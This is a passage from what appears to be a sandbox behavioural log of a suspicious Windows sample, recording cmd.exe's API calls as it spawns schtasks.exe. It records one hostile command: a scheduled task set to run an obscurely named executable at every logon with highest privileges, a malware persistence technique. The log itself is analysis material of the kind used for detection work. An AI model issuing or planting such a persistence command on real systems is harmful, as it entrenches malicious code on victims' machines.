_String2="CD") returned 8 [0027.898] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0027.898] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0027.898] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0027.898] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0027.898] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0027.898] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0027.898] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0027.898] GetProcessHeap () returned 0x610000 [0027.898] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x54) returned 0x6217e0 [0027.898] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f538 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0027.898] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x24f538, lpFilePart=0x24f534 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x24f534*="Desktop") returned 0x25 [0027.898] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0027.898] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f2b4 | out: lpFindFileData=0x24f2b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x625780 [0027.898] FindClose (in: hFindFile=0x625780 | out: hFindFile=0x625780) returned 1 [0027.898] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x24f2b4 | out: lpFindFileData=0x24f2b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x625780 [0027.898] FindClose (in: hFindFile=0x625780 | out: hFindFile=0x625780) returned 1 [0027.898] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0027.899] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x24f2b4 | out: lpFindFileData=0x24f2b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9e153a0, ftLastAccessTime.dwHighDateTime=0x1d5e3d9, ftLastWriteTime.dwLowDateTime=0x9e153a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x625780 [0027.899] FindClose (in: hFindFile=0x625780 | out: hFindFile=0x625780) returned 1 [0027.899] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0027.899] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0027.899] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0027.899] GetProcessHeap () returned 0x610000 [0027.899] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x624c90 | out: hHeap=0x610000) returned 1 [0027.899] GetEnvironmentStringsW () returned 0x6241a0* [0027.899] GetProcessHeap () returned 0x610000 [0027.899] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb36) returned 0x625fc0 [0027.899] FreeEnvironmentStringsW (penv=0x6241a0) returned 1 [0027.899] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a025260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0027.899] GetProcessHeap () returned 0x610000 [0027.899] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6217e0 | out: hHeap=0x610000) returned 1 [0027.899] GetProcessHeap () returned 0x610000 [0027.899] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400e) returned 0x626b00 [0027.900] GetProcessHeap () returned 0x610000 [0027.900] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xc8) returned 0x622e70 [0027.900] GetProcessHeap () returned 0x610000 [0027.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x626b00 | out: hHeap=0x610000) returned 1 [0027.900] GetConsoleOutputCP () returned 0x1b5 [0027.900] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a024260 | out: lpCPInfo=0x4a024260) returned 1 [0027.900] GetUserDefaultLCID () returned 0x409 [0027.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a024950, cchData=8 | out: lpLCData=":") returned 2 [0027.901] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f678, cchData=128 | out: lpLCData="0") returned 2 [0027.901] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f678, cchData=128 | out: lpLCData="0") returned 2 [0027.901] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f678, cchData=128 | out: lpLCData="1") returned 2 [0027.901] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a024940, cchData=8 | out: lpLCData="/") returned 2 [0027.901] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a024d80, cchData=32 | out: lpLCData="Mon") returned 4 [0027.901] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a024d40, cchData=32 | out: lpLCData="Tue") returned 4 [0027.901] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a024d00, cchData=32 | out: lpLCData="Wed") returned 4 [0027.901] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a024cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0027.901] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a024c80, cchData=32 | out: lpLCData="Fri") returned 4 [0027.901] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a024c40, cchData=32 | out: lpLCData="Sat") returned 4 [0027.901] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a024c00, cchData=32 | out: lpLCData="Sun") returned 4 [0027.901] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a024930, cchData=8 | out: lpLCData=".") returned 2 [0027.901] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a024920, cchData=8 | out: lpLCData=",") returned 2 [0027.901] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0027.902] GetProcessHeap () returned 0x610000 [0027.902] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20c) returned 0x622f40 [0027.902] GetConsoleTitleW (in: lpConsoleTitle=0x622f40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0027.902] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0027.903] GetProcAddress (hModule=0x76e10000, lpProcName="CopyFileExW") returned 0x76e43b92 [0027.903] GetProcAddress (hModule=0x76e10000, lpProcName="IsDebuggerPresent") returned 0x76e24a5d [0027.903] GetProcAddress (hModule=0x76e10000, lpProcName="SetConsoleInputExeNameW") returned 0x76e3a79d [0027.903] GetProcessHeap () returned 0x610000 [0027.904] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400a) returned 0x626b00 [0027.904] GetProcessHeap () returned 0x610000 [0027.904] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x626b00 | out: hHeap=0x610000) returned 1 [0027.904] _wcsicmp (_String1="schtasks", _String2=")") returned 74 [0027.904] _wcsicmp (_String1="FOR", _String2="schtasks") returned -13 [0027.904] _wcsicmp (_String1="FOR/?", _String2="schtasks") returned -13 [0027.904] _wcsicmp (_String1="IF", _String2="schtasks") returned -10 [0027.904] _wcsicmp (_String1="IF/?", _String2="schtasks") returned -10 [0027.904] _wcsicmp (_String1="REM", _String2="schtasks") returned -1 [0027.904] _wcsicmp (_String1="REM/?", _String2="schtasks") returned -1 [0027.904] GetProcessHeap () returned 0x610000 [0027.904] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x623158 [0027.904] GetProcessHeap () returned 0x610000 [0027.904] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1a) returned 0x625800 [0027.906] GetProcessHeap () returned 0x610000 [0027.906] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb4) returned 0x6231b8 [0027.907] GetConsoleTitleW (in: lpConsoleTitle=0x24f370, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0027.907] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0027.907] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0027.907] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0027.907] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0027.907] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0027.907] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0027.907] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0027.907] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0027.907] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0027.907] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0027.907] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0027.907] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0027.908] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0027.908] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0027.908] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0027.908] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0027.908] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0027.908] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0027.908] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0027.908] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0027.908] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0027.908] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0027.908] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0027.908] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0027.908] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0027.908] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0027.908] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0027.908] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0027.908] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0027.908] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0027.908] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0027.908] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0027.908] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0027.908] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0027.908] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0027.908] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0027.908] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0027.908] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0027.908] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0027.908] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0027.908] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0027.908] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0027.908] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0027.908] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0027.908] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0027.908] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0027.908] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0027.909] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0027.909] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0027.909] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0027.909] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0027.909] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0027.909] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0027.909] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0027.909] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0027.909] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0027.909] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0027.909] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0027.909] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0027.909] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0027.909] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0027.909] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0027.909] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0027.909] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0027.909] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0027.909] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0027.909] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0027.909] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0027.909] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0027.909] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0027.909] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0027.909] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0027.909] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0027.909] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0027.909] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0027.909] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0027.909] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0027.909] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0027.909] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0027.909] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0027.909] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0027.909] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0027.909] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0027.910] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0027.910] _wcsicmp (_String1="schtasks", _String2="FOR") returned 13 [0027.910] _wcsicmp (_String1="schtasks", _String2="IF") returned 10 [0027.910] _wcsicmp (_String1="schtasks", _String2="REM") returned 1 [0027.910] GetProcessHeap () returned 0x610000 [0027.910] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x210) returned 0x623278 [0027.910] GetProcessHeap () returned 0x610000 [0027.910] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xc6) returned 0x623490 [0027.910] _wcsnicmp (_String1="scht", _String2="cmd ", _MaxCount=0x4) returned 16 [0027.910] GetProcessHeap () returned 0x610000 [0027.910] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x418) returned 0x6107f0 [0027.910] SetErrorMode (uMode=0x0) returned 0x0 [0027.910] SetErrorMode (uMode=0x1) returned 0x0 [0027.910] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6107f8, lpFilePart=0x24ee90 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x24ee90*="Desktop") returned 0x25 [0027.911] SetErrorMode (uMode=0x0) returned 0x1 [0027.911] GetProcessHeap () returned 0x610000 [0027.911] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6107f0, Size=0x66) returned 0x6107f0 [0027.911] GetProcessHeap () returned 0x610000 [0027.911] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x6107f0) returned 0x66 [0027.911] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a030640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0027.911] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0027.911] GetProcessHeap () returned 0x610000 [0027.911] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x120) returned 0x623560 [0027.911] GetProcessHeap () returned 0x610000 [0027.911] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x238) returned 0x610860 [0027.920] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0027.920] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x24ec0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec0c) returned 0xffffffff [0027.920] GetLastError () returned 0x2 [0027.920] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\schtasks", fInfoLevelId=0x1, lpFindFileData=0x24ec0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec0c) returned 0xffffffff [0027.921] GetLastError () returned 0x2 [0027.921] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0027.921] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x24ec0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec0c) returned 0x623688 [0027.921] GetProcessHeap () returned 0x610000 [0027.921] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x621818 [0027.921] FindClose (in: hFindFile=0x623688 | out: hFindFile=0x623688) returned 1 [0027.921] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.COM", fInfoLevelId=0x1, lpFindFileData=0x24ec0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec0c) returned 0xffffffff [0027.921] GetLastError () returned 0x2 [0027.921] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.EXE", fInfoLevelId=0x1, lpFindFileData=0x24ec0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec0c) returned 0x623688 [0027.921] GetProcessHeap () returned 0x610000 [0027.921] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x621818, Size=0x4) returned 0x621818 [0027.921] FindClose (in: hFindFile=0x623688 | out: hFindFile=0x623688) returned 1 [0027.921] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0027.921] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0027.921] GetConsoleTitleW (in: lpConsoleTitle=0x24f104, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0027.922] InitializeProcThreadAttributeList (in: lpAttributeList=0x24ef8c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f054 | out: lpAttributeList=0x24ef8c, lpSize=0x24f054) returned 1 [0027.922] UpdateProcThreadAttribute (in: lpAttributeList=0x24ef8c, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f04c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24ef8c, lpPreviousValue=0x0) returned 1 [0027.922] GetStartupInfoW (in: lpStartupInfo=0x24ef48 | out: lpStartupInfo=0x24ef48*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0027.922] lstrcmpW (lpString1="\\schtasks.exe", lpString2="\\XCOPY.EXE") returned -1 [0027.923] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\schtasks.exe", lpCommandLine="schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x24efe8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f034 | out: lpCommandLine="schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE", lpProcessInformation=0x24f034*(hProcess=0x78, hThread=0x74, dwProcessId=0x994, dwThreadId=0x984)) returned 1 [0027.929] CloseHandle (hObject=0x74) returned 1 [0027.929] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0027.929] GetProcessHeap () returned 0x610000 [0027.929] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x625fc0 | out: hHeap=0x610000) returned 1 [0027.929] GetEnvironmentStringsW () returned 0x625fc0* [0027.929] GetProcessHeap () returned 0x610000 [0027.929] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb36) returned 0x6241a0 [0027.929] FreeEnvironmentStringsW (penv=0x625fc0) returned 1 [0027.929] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0029.109] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x24ef28 | out: lpExitCode=0x24ef28*=0x0) returned 1 [0029.110] CloseHandle (hObject=0x78) returned 1 [0029.110] _vsnwprintf (in: _Buffer=0x24f070, _BufferCount=0x13, _Format="%08X", _ArgList=0x24ef34 | out: _Buffer="00000000") returned 8 [0029.110] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0029.110] GetProcessHeap () returned 0x610000 [0029.110] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6241a0 | out: hHeap=0x610000) returned 1 [0029.110] GetEnvironmentStringsW () returned 0x6241a0* [0029.110] GetProcessHeap () returned 0x610000 [0029.110] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb5c) returned 0x629668 [0029.110] FreeEnvironmentStringsW (penv=0x6241a0) returned 1 [0029.110] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0029.110] GetProcessHeap () returned 0x610000 [0029.110] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x629668 | out: hHeap=0x610000) returned 1 [0029.110] GetEnvironmentStringsW () returned 0x6241a0* [0029.110] GetProcessHeap () returned 0x610000 [0029.110] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb5c) returned 0x629668 [0029.110] FreeEnvironmentStringsW (penv=0x6241a0) returned 1 [0029.110] GetProcessHeap () returned 0x610000 [0029.110] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x61ffd8 | out: hHeap=0x610000) returned 1 [0029.110] DeleteProcThreadAttributeList (in: lpAttributeList=0x24ef8c | out: lpAttributeList=0x24ef8c) [0029.110] _get_osfhandle (_FileHandle=1) returned 0x7 [0029.110] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0029.111] _get_osfhandle (_FileHandle=1) returned 0x7 [0029.111] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0241ac | out: lpMode=0x4a0241ac) returned 1 [0029.111] _get_osfhandle (_FileHandle=0) returned 0x3 [0029.111] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0241b0 | out: lpMode=0x4a0241b0) returned 1 [0029.111] SetConsoleInputExeNameW () returned 0x1 [0029.111] GetConsoleOutputCP () returned 0x1b5 [0029.111] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a024260 | out: lpCPInfo=0x4a024260) returned 1 [0029.111] SetThreadUILanguage (LangId=0x0) returned 0x409 [0029.111] exit (_Code=0) Process: id = "3" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x33a5d000" os_pid = "0x994" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xae4" cmd_line = "schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0x984 [0028.259] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f84c | out: lpSystemTimeAsFileTime=0x16f84c*(dwLowDateTime=0x11138d00, dwHighDateTime=0x1d5e3d9)) [0028.259] GetCurrentProcessId () returned 0x994 [0028.259] GetCurrentThreadId () returned 0x984 [0028.259] GetTickCount () returned 0x11527ad [0028.259] RtlQueryPerformanceCounter () returned 0x1 [0028.260] GetModuleHandleA (lpModuleName=0x0) returned 0xfe0000 [0028.260] __set_app_type (_Type=0x1) [0028.260] __p__fmode () returned 0x76be31f4 [0028.260] __p__commode () returned 0x76be31fc [0028.260] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff7881) returned 0x0 [0028.260] __wgetmainargs (in: _Argc=0x1009e6c, _Argv=0x1009e74, _Env=0x1009e70, _DoWildCard=0, _StartInfo=0x1009e80 | out: _Argc=0x1009e6c, _Argv=0x1009e74, _Env=0x1009e70) returned 0 [0028.261] _onexit (_Func=0x1000fe2) returned 0x1000fe2 [0028.261] _onexit (_Func=0x1000ff3) returned 0x1000ff3 [0028.261] _onexit (_Func=0x1001002) returned 0x1001002 [0028.261] _onexit (_Func=0x100101e) returned 0x100101e [0028.261] _onexit (_Func=0x100103a) returned 0x100103a [0028.261] _onexit (_Func=0x1001056) returned 0x1001056 [0028.261] _onexit (_Func=0x1001072) returned 0x1001072 [0028.262] _onexit (_Func=0x100108e) returned 0x100108e [0028.262] _onexit (_Func=0x10010aa) returned 0x10010aa [0028.262] _onexit (_Func=0x10010c6) returned 0x10010c6 [0028.262] _onexit (_Func=0x10010e2) returned 0x10010e2 [0028.262] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0028.262] WinSqmIsOptedIn () returned 0x0 [0028.262] GetProcessHeap () returned 0x350000 [0028.262] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x10) returned 0x364c28 [0028.262] SetLastError (dwErrCode=0x0) [0028.263] VerSetConditionMask (ConditionMask=0x0, 